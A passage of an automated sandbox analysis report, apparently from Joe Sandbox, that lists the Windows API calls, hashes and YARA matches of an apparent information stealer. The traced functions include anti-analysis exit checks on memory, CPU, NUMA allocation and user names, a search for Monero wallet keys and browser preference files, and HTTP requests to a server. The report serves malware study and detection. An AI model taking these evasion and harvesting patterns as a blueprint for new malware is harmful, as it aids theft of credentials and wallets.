                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                  • Instruction ID: fab478a7b59183dd729af1a3969306e06b8f6b67735528ee0e4710c51d29941d
                  • Opcode Fuzzy Hash: 60628e0114aa94fff99429ac77e60d89df69b7b06214d7b097c1eea3cad2c412
                  • Instruction Fuzzy Hash: B2E11E769501089BDB14FBB4EC97AED7338EF94300F508528B50666196EF34AA4DCBB3

                  Control-flow Graph

                  • Graph image not preserved in extraction: function d417a0-d419cd; nodes labelled StrCmpCA, ExitProcess (executed / not executed colouring lost)
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00D417C5
                  • ExitProcess.KERNEL32 ref: 00D417D1
                  Strings
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: ba09733f58bda216976868856735533b5fe4fd62fb778c381bd05b835522b8b7
                  • Instruction ID: 0b7e8ce9fbb2a06378773ec1a81d63dab4b6e09715817063f2098291636555b0
                  • Opcode Fuzzy Hash: ba09733f58bda216976868856735533b5fe4fd62fb778c381bd05b835522b8b7
                  • Instruction Fuzzy Hash: B65143B8A1420AEFDB04DFA4D954BBE7BB5BB44305F108049E816AB240D770E985DF72

                  Control-flow Graph

                  • Graph image not preserved in extraction: function d47500-d4768e; nodes labelled GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA (executed / not executed colouring lost)
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D47542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D4760A
                  • wsprintfA.USER32 ref: 00D47640
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                  • Instruction ID: 5e7afc32cd026c07d18de93a34a216481f68d57a9a25cda5a408f8625ea13496
                  • Opcode Fuzzy Hash: 431532822bc1db18e4264fe4e2c3d7d50ac6733e5ece21c070799c20d7221744
                  • Instruction Fuzzy Hash: 744181B1D04248ABDF10DF94DC45BEEBBB8EF48704F144199F50967280D774AA84CBB6

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2380), ref: 00D498A1
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2260), ref: 00D498BA
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2308), ref: 00D498D2
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF22C0), ref: 00D498EA
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2218), ref: 00D49903
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF8F98), ref: 00D4991B
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5AF0), ref: 00D49933
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5C90), ref: 00D4994C
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF23B0), ref: 00D49964
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2470), ref: 00D4997C
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2440), ref: 00D49995
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF2458), ref: 00D499AD
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AE5D70), ref: 00D499C5
                    • Part of subcall function 00D49860: GetProcAddress.KERNEL32(74DD0000,00AF24A0), ref: 00D499DE
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                    • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                    • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                    • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                    • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                    • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                    • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                    • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                    • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                    • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                    • Part of subcall function 00D46770: GetUserDefaultLangID.KERNEL32 ref: 00D46774
                    • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                    • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                    • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                    • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                    • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                    • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                    • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                  • Sleep.KERNEL32(00001770), ref: 00D46B04
                  • CloseHandle.KERNEL32(?,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                  • ExitProcess.KERNEL32 ref: 00D46B22
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                  • Instruction ID: daf7506ad8c9c499867baae75680c784f06872c1690c24ecbf5fc35296239abb
                  • Opcode Fuzzy Hash: 741ff3814728a27feb226640984db7457a8b92567368ce9090b07525f494bea9
                  • Instruction Fuzzy Hash: B6312870940209ABEB04FBF4DC56BEE7778EF44341F414518F602A2182DF70A945CAB3

                  Control-flow Graph

                  • Executed
                  • Not Executed
                   • Control-flow graph nodes (basic block address ranges and the calls they contain): 1436 d31220-d31247 (call d489b0, GlobalMemoryStatusEx); 1439 d31273-d3127a; 1440 d31249-d31271 (call d4da00 * 2); 1441 d31281-d31285; 1443 d31287; 1444 d3129a-d3129d; 1447 d31292-d31294 (ExitProcess); 1448 d31289-d31290
                   • Control-flow graph edges: 1436->1439, 1436->1440, 1439->1441, 1440->1441, 1441->1443, 1441->1444, 1443->1447, 1443->1448, 1448->1444, 1448->1447
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                  • __aulldiv.LIBCMT ref: 00D31258
                  • __aulldiv.LIBCMT ref: 00D31266
                  • ExitProcess.KERNEL32 ref: 00D31294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                  • Instruction ID: fd73c530da668f46597e26511e9cfa144752eb07a4bfa1de234f005ff74c8c19
                  • Opcode Fuzzy Hash: 62a4dab229024cfaf238bf2833ce69ffba03aa6233bfda1984ec2262e0d8b4b0
                  • Instruction Fuzzy Hash: 3A016DB4D40309BBEB10EFE4CC4AB9EBBB8EB14705F248048E705B62C0D77495418BAD

                  Control-flow Graph

                  • Executed
                  • Not Executed
                   • Control-flow graph nodes (basic block address ranges and the calls they contain): 1450 d46af3; 1451 d46b0a; 1453 d46b0c-d46b22 (call d46920, call d45b10, CloseHandle, ExitProcess); 1454 d46aba-d46ad7 (call d4aad0, OpenEventA); 1459 d46af5-d46b04 (CloseHandle, Sleep); 1460 d46ad9-d46af1 (call d4aad0, CreateEventA)
                   • Control-flow graph edges: 1450->1451, 1451->1453, 1451->1454, 1454->1459, 1454->1460, 1459->1451, 1460->1453
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00D46AF9
                  • Sleep.KERNEL32(00001770), ref: 00D46B04
                  • CloseHandle.KERNEL32(?,00000000,?,00AF8F08,?,00D5110C,?,00000000,?,00D51110,?,00000000,00D50AEF), ref: 00D46B1A
                  • ExitProcess.KERNEL32 ref: 00D46B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                  • Instruction ID: 59aa43c63c7ee39f69ae1c226f20b9de7e2c9da13724a7b908c72b56e9f0f064
                  • Opcode Fuzzy Hash: 0d5dfb46824d8aaa39e9c95e2ed31ad929464c4ef5f4fed7b3c1257a34d9be14
                  • Instruction Fuzzy Hash: 2CF0F870A4021DABE710ABA0EC0ABBE7B74EB45741F104914B517A51D1DBB09981EAB7

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 507d7c2a9e6f23623fb205ab3bd861094adae8688d3d80b9654f65966668b31c
                  • Instruction ID: 301632d0ff6032a5b4bd8058f96be49dfa746a292cc3a24081246c0145b0741f
                  • Opcode Fuzzy Hash: 507d7c2a9e6f23623fb205ab3bd861094adae8688d3d80b9654f65966668b31c
                  • Instruction Fuzzy Hash: 6F214DB1D00209ABEF14DFA4E845ADE7B75FF44320F108625F929A72C1EB706A05CF92

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D36280: InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                    • Part of subcall function 00D36280: StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D36303
                    • Part of subcall function 00D36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                    • Part of subcall function 00D36280: HttpOpenRequestA.WININET(00000000,GET,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D36385
                    • Part of subcall function 00D36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                    • Part of subcall function 00D36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                  • Instruction ID: 764bd7c76c9df298beea16992475230983d77ab0f1c116ae9595639995102b61
                  • Opcode Fuzzy Hash: 4ed2a64b527215fe951fb0ea8ace52bd1155d7af6c8b4153cca183d053516b5f
                  • Instruction Fuzzy Hash: E8110030954148ABEB14FF68DD92AED7338EF50300F404558F81A5B592EF70AB09CAB2
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                  • ExitProcess.KERNEL32 ref: 00D31143
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                  • Instruction ID: 78bf702b8287c4b18e53dd94d146ac6fd80ad8351d97ec3d6e98eef1e5a61048
                  • Opcode Fuzzy Hash: 45fb9219c70d708db7fdaf5425d81b259e220b1b537079d77d7d1f9d28afaa4a
                  • Instruction Fuzzy Hash: 65E0E67494530CFBE7546BA09D0AB4D7678EB44B02F104054F70D761D0D6B52645A6AB
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                  • Instruction ID: 11e0e3d7fbcea94212452629efdedc49435f015b9b9677f19bfb505cff357a93
                  • Opcode Fuzzy Hash: 0edfb0e64b2bfbd0748eab4fe0104a03094f03faa1315114db1772bedba6d00e
                  • Instruction Fuzzy Hash: 74F0E2B1641208BBEB189AA4AC49FAEB7E8E705B15F301448F504E7280D5719E40DAA1
                  APIs
                    • Part of subcall function 00D478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                    • Part of subcall function 00D478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                    • Part of subcall function 00D478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                    • Part of subcall function 00D47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                    • Part of subcall function 00D47850: RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                    • Part of subcall function 00D47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                  • ExitProcess.KERNEL32 ref: 00D311C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                  • Instruction ID: e3e843ae15def6141d413976fb969309e0f37740074ae3ff6a8edbdf569a14ff
                  • Opcode Fuzzy Hash: f9cfb9cc883a2fc805e631d7a803479b5c73e70220cff5efe4a5bacddcdb0443
                  • Instruction Fuzzy Hash: 48E012B591430653CB0477B0BC0BB2E329C9B54786F080824FA09D2102FA65E8419677
                  APIs
                  • wsprintfA.USER32 ref: 00D438CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D438E3
                  • lstrcat.KERNEL32(?,?), ref: 00D43935
                  • StrCmpCA.SHLWAPI(?,00D50F70), ref: 00D43947
                  • StrCmpCA.SHLWAPI(?,00D50F74), ref: 00D4395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D43C67
                  • FindClose.KERNEL32(000000FF), ref: 00D43C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                  • Instruction ID: b81db80f167c0bea1ab0dd2317f57e6ad2de6fc1ea852b9853646a60d129e95e
                  • Opcode Fuzzy Hash: 52221bc0ae4166d611ca7497add02f11823234ade792df3ce45d73e891d0ae19
                  • Instruction Fuzzy Hash: E6A110B1940218ABDB24EBA4DC85FEE7778FF88301F084588A54D96141EB759B89CF72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2B,00000000,?,?,?,00D513F4,00D50B2A), ref: 00D3BEF5
                  • StrCmpCA.SHLWAPI(?,00D513F8), ref: 00D3BF4D
                  • StrCmpCA.SHLWAPI(?,00D513FC), ref: 00D3BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00D3C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                  • Instruction ID: 3c3fed2af970b7db027af52e9ecf5926c51ce0ea19e14420cf2d7dabdc253b56
                  • Opcode Fuzzy Hash: 85ff63eb34149a87cea95cb72e2bce879dd9d623412a37eec194c073754e9748
                  • Instruction Fuzzy Hash: 91425272950108ABEB14FB74DD96EED737DEF84300F404558B90AA6191EF34AB49CBB2
                  APIs
                  • wsprintfA.USER32 ref: 00D4492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                  • StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                  • StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                  • FindClose.KERNEL32(000000FF), ref: 00D44B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                  • Instruction ID: f41693a96c25863472d8cda70152a35a312fb903aabd21f80330b76a99c55f56
                  • Opcode Fuzzy Hash: 04c202ebc4431351194aafa5340993701b5c738c8b7e1459ddb9f0ea00834fc2
                  • Instruction Fuzzy Hash: 3B6113B2500219ABCB24EBA0DC45FEE777CFB88701F044588A54D96141EA75DB89DFB2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D44580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D44587
                  • wsprintfA.USER32 ref: 00D445A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D445BD
                  • StrCmpCA.SHLWAPI(?,00D50FC4), ref: 00D445EB
                  • StrCmpCA.SHLWAPI(?,00D50FC8), ref: 00D44601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4468B
                  • FindClose.KERNEL32(000000FF), ref: 00D446A0
                  • lstrcat.KERNEL32(?,00AFEA18), ref: 00D446C5
                  • lstrcat.KERNEL32(?,00AFDBC0), ref: 00D446D8
                  • lstrlen.KERNEL32(?), ref: 00D446E5
                  • lstrlen.KERNEL32(?), ref: 00D446F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                  • Instruction ID: 5d0c93162240e45786f785c40a0b0f445cef3b4ead4e96500cf346ad269c0dc4
                  • Opcode Fuzzy Hash: 496c1c12e90602aa7cc2ca506819edbd1637320e36795921eed91f831634050c
                  • Instruction Fuzzy Hash: 8B5121B654021CABCB24EB70DC89FED777CAB98701F404588B60D96190EB749AC59FB2
                  APIs
                  • wsprintfA.USER32 ref: 00D43EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00D43EDA
                  • StrCmpCA.SHLWAPI(?,00D50FAC), ref: 00D43F08
                  • StrCmpCA.SHLWAPI(?,00D50FB0), ref: 00D43F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00D4406C
                  • FindClose.KERNEL32(000000FF), ref: 00D44081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
                  • Instruction ID: 2b687ed4e12ca080d8043852e855e51006bda27a38e8105f3614e78126ffa0f1
                  • Opcode Fuzzy Hash: 495fdbc1104f8b0c5525cf939cc006979bad715b3cf419c8da8e2cd9dcd15298
